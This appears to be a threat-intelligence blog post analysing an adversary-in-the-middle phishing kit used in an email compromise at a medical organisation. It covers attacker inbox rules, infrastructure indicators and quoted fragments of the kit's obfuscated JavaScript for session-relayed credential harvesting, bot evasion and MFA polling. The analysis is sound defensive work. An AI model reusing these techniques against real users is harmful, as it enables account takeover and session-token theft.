Polymorphic AiTM Phishing Kit
Polymorphic JS core (module.php) + MFA state machine
Not so long in the cesspool of dysfunction that lives in the den of cyber inequity, we came across an interesting business email compromise where a fascinating phishing kit was used. Similar to Tycoon 2FA with a little extra, the objective was not only to bypass MFA but to pilfer the SessionID token for maximum utility.
Central to this case is the way the code relies on heavily obfuscated and polymorphic JavaScript to dynamically construct page elements, validation logic, and user flow at runtime, rather than exposing a fixed and easily fingerprinted script.
This approach complicates signature-based detection. The case notes focus on how this polymorphic JavaScript framework supports brand impersonation, bot and sandbox evasion, and staged credential collection — all while maintaining a user experience consistent with legitimate authentication workflows.
As always, names have been changed — except for our external entity.
The Incident — Credentialed Access
In this case, “Elliot Kane” (name changed) was a compromised mailbox user within the NorthBridge Medical environment. The message activity was not spoofed. Header artifacts showed a successful MAPI submission:
- MAPI build:
15.20.9611.008 - Interpretation: the actor authenticated using valid credentials and sent mail from within the account context.
The Self-Send Maneuver
The attacker sent the message from Elliot Kane to Elliot Kane. Once safely inside the mailbox, it was forwarded outward to “Daniel Reeves”.
This maneuver reduces first contact or external sender warnings and makes the message appear operationally normal before it is weaponized outward.
Signature Replication Clue
The header contained:
x-codetwo-clientsignature-inserted: true
This indicates the environment uses CodeTwo for automated signature injection. The external entity clearly understood this — staging a fallback signature asset to replicate the expected corporate look if automation failed during the unauthorized session.
Confirmed Mailbox Access & Persistence
- Accessed via Exchange Online
- Activity window: February 11, 2026 — 20:08 to 20:10 UTC
- Short smash-and-grab access pattern
- Immediate persistence through inbox rule manipulation
Inbox Rules Created
- Rule 1: Redirect mail from the primary partner domain to RSS Feeds.
- Rule 2: Redirect messages containing keywords such as “phishing,” “compromise,” “hack,” or “spam” to RSS Feeds.
If a security alert arrived, it never surfaced in the primary inbox.
Representative Data Targeting (Names Changed)
- FW: Remittance Confirmation — January Cycle
- RE: Patient Intake Record Update
- RE: Chart Review — MRN 847219
- RE: Case Manager — Delivery Coordination
- Desk Drop: Internal Workflow Adjustment
Total items accessed: 14
Attacker Infrastructure
| Type | Indicator | Details |
|---|---|---|
| Attacker Egress | 142.111.241.16 |
Windows Server 2022 (10.0.20348) Ace Data Centers II, L.L.C. Port 3389/tcp (RDP) Cert CN: WIN-8OA3CCQAE4D |
| Proxy Host | medegesolutions.alphawreckings.com |
AiTM relay host |
| Resolved IP | 216.126.239.77 |
Apache 2.4.58 77.239.126.216.static.cloudzy.com |
| Reported CVEs | 216.126.239.77:80 |
CVE-2024-47252 CVE-2024-38475 CVE-2025-49630 CVE-2023-38709 CVE-2024-38473 CVE-2025-55753 CVE-2025-58098 CVE-2013-4365 CVE-2012-3526 CVE-2024-40898 CVE-2024-38476 CVE-2024-27316 CVE-2024-38474 CVE-2024-24795 CVE-2024-38472 CVE-2025-66200 CVE-2009-0796 CVE-2012-4001 CVE-2024-42516 CVE-2012-4360 CVE-2011-1176 CVE-2025-49812 CVE-2011-2688 CVE-2025-59775 CVE-2025-53020 CVE-2013-2765 CVE-2024-43394 CVE-2007-4723 CVE-2013-0941 CVE-2013-0942 CVE-2024-36387 CVE-2025-65082 CVE-2024-39573 CVE-2025-23048 CVE-2009-2299 CVE-2024-38477 CVE-2024-43204 |
Technical Analysis — Polymorphic JS Core (module.php)
All code excerpts below are taken from the original kit artifacts posted here: https://cybercrypto.net/phishing-module/
The phishing kit’s central differentiator is its polymorphic JavaScript framework. Rather than exposing static DOM identifiers, it decodes them at runtime.
Phase 1 — Runtime Decoding (module.php excerpt)
Reference: see the “initialization/decoding” section in the artifact page above.
const hbIds = JSON.parse(atob(window[_funcs14.damang]));
const _classes81 = JSON.parse(atob(window[_funcs14.suke]));
Button IDs and class names mutate per session. Static signature detection fails because the DOM is constructed dynamically.
Phase 2 — Honeypot Execution (module.php excerpt)
Reference: see the “honeypot” logic in the artifact page above.
const hps = document.querySelectorAll('.' + _getClass91('honeypot'));
for (let hp of hps) {
if (hp.value !== '') {
window.location.href = hbCache[hbProps.random] + '#hp';
return;
}
}
Bots that auto-fill hidden fields are redirected instantly.
Phase 3 — Credential Relay (module.php excerpt)
Reference: see the Ajax credential posting logic in the artifact page above.
$.ajax({
url: hbCache[hbProps.validate],
data: { em: val, pa: val_pwd },
success: function(r) {
if (r.live && r.twofactor) _process2FA88(r.twofactor_info);
}
});
Credentials are relayed to the proxy, which interacts with the legitimate Microsoft endpoint.
Phase 4 — MFA State Machine (module.php excerpt)
Reference: see the MFA “verify_app” polling logic in the artifact page above.
if (dataUrl === 'verify_app') {
elementsb176.entropy.innerHTML = r.entropy;
const intId = setInterval(() => {
pollAppfedb(intId);
}, 5000);
}
Instead of breaking MFA, the kit waits for the user to satisfy it — then harvests the resulting session token.
Phase 5 — Clean Exit (module.php excerpt)
Reference: see the final redirect handler in the artifact page above.
const hbHandleFinal = () => {
if (viewRef === 'final')
window.location.href = atob(hbCache[hbProps.finalRedirect]);
};
The user is redirected to a benign location while the attacker immediately begins using the stolen session.